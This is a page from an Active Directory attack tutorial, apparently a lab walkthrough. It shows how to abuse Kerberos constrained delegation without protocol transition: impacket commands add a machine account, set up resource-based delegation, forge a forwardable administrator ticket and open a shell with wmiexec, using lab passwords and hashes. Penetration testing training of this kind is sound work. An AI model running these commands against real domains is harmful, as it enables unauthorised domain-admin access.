Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  1. Delegations
  2. Constrain Delegation

Without protocol transition

PreviousWith Protocol TransmitionNextResource Based Constrained Delegation

Last updated 2 years ago

To look at this option, rdp with Fernando.Alonzo

xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80%  /cert-ignore

This result to this in the windows GUI :

The self-RBCD trick doesn’t work anymore. When i was writing this article i tried the self-rbcd without success many times. After multiple tries and fail i ask to charlie (@_nwodtuhs) what i am doing wrong, because i can’t find out why this don’t work as expected. He explained to me that the self rbcd trick didn’t work anymore and have been silent patch by Microsoft :’(

  • To exploit the constrained delegation here we only need a forwardable TGS as administrator to any service on castelblack

  • But if we do a s4u (s4u2self + s4u2proxy) like we did with protocol transition, the s4uself will send us a not forwardable TGS and the attack will fail.

  • So to exploit and get the forwardable TGS we need, we first need to add a computer and use RBCD between the created computer (rbcd_const$) and the computer who have delegation set (here castelblack$).

  • By doing that, you can do a s4u2self followed by a s4u2proxy on the added computer and the result is a forwardable tgs on hots/castelblack$ as administrator.

  • Once that done, you have the forwardable ticket to pass to s4u2proxy, and we even can change the request service with -altservice

# add computer X (rbcd_const)
addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.newyork.local/pablo.sandoval:baseballpanda'

# add rbcd from X (rbcd_const) to constrained (Yonkers)
rbcd.py -delegate-from 'rbcd_const$' -delegate-to 'Yonkers$' -dc-ip 192.168.56.11 -action 'write' -hashes ':2634cbdd337c86aa0ecffd1dd457a2a8' north.newyork.local/'Yonkers$'

  • Do the s4u2self followed by the s4u2proxy on Yonkers (this is the classic RBCD attack)

# s4u2self on X (rbcd_const)
getST.py -self -impersonate "administrator" -dc-ip 192.168.56.11  north.newyork.local/'rbcd_const$':'rbcdpass'
# s4u2proxy from X (rbcd_const) to constrained (Yonkers)
getST.py -impersonate "administrator" -spn "host/Yonkers" -additional-ticket 'administrator@rbcd_const$@NORTH.newyork.LOCAL.ccache' -dc-ip 192.168.56.11  north.newyork.local/'rbcd_const$':'rbcdpass'

  • And launch the s4uProxy with the forwardable ticket

# s4u2proxy from constrained (yonkers) to target (bronx) - with altservice to change the SPN in use
getST.py -impersonate "administrator" -spn "http/bronx" -altservice "cifs/bronx" -additional-ticket 'Administrator@host_yonkers@NORTH.NEWYORK.LOCAL.ccache' -hashes :2634cbdd337c86aa0ecffd1dd457a2a8 -dc-ip 192.168.56.11 north.newyork.local/'yonkers$'

export KRB5CCNAME=/workspace/administrator@cifs_yonkers@NORTH.NEWYORK.LOCAL.ccache 
wmiexec.py -k -no-pass north.newyork.local/administrator@yonkers

  • After the exploit a little clean up of the lab, flush the rbcd entry and delete the computer account with a domain admin:

rbcd.py -delegate-to 'yonkers$' -delegate-from 'rbcd_const$' -dc-ip 192.168.56.11 -action 'flush' -hashes ':2634cbdd337c86aa0ecffd1dd457a2a8' north.newyork.local/'Yonkers$'
addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1!' -delete

A good example of exploitation can be found here:

https://snovvcrash.rocks/2022/03/06/abusing-kcd-without-protocol-transition.html